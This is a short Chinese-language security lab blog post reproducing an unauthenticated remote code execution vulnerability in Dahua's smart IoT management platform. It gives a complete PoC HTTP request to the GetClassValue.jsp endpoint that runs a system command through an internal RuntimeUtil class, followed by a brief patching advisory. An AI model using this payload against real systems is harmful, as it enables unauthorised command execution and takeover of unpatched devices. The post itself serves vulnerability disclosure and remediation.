【成功复现】大华智能物联综合管理平台远程代码执行漏洞

【成功复现】大华智能物联综合管理平台远程代码执行漏洞

奥村燐 弥天安全实验室 2025-01-03 10:50

网安引领时代,弥天点亮未来 ****



0x00漏洞描述

大华智能物联综合管理平台 GetClassValue.jsp 接口存在远程代码执行漏洞,未经身份验证的恶意攻击者可以利用该漏洞远程执行任意命令,获取系统权限。



0x01影响范围

该漏洞影响所有未更新修复补丁的大华智能物联综合管理平台版本。



0x02复现过程

POC

POST /evo-apigw/admin/API/Developer/GetClassValue.jsp HTTP/1.1
Host: xxxxxxxxxxxxxxxxxx
Content-Type: application/json

{"data": {"clazzName": "com.dahua.admin.util.RuntimeUtil", "methodName": "syncexecReturnInputStream", "fieldName": ["whoami"]}}




0x03修复方案

为防范该漏洞带来的安全风险,建议受影响的用户立即采取以下措施:

官方修复:请尽快联系大华官方获取漏洞解决方案及升级补丁,确保平台安全。



知识分享完了喜欢别忘了关注我们哦~学海浩茫,予以风动,必降弥天之润!   弥  天安全实验室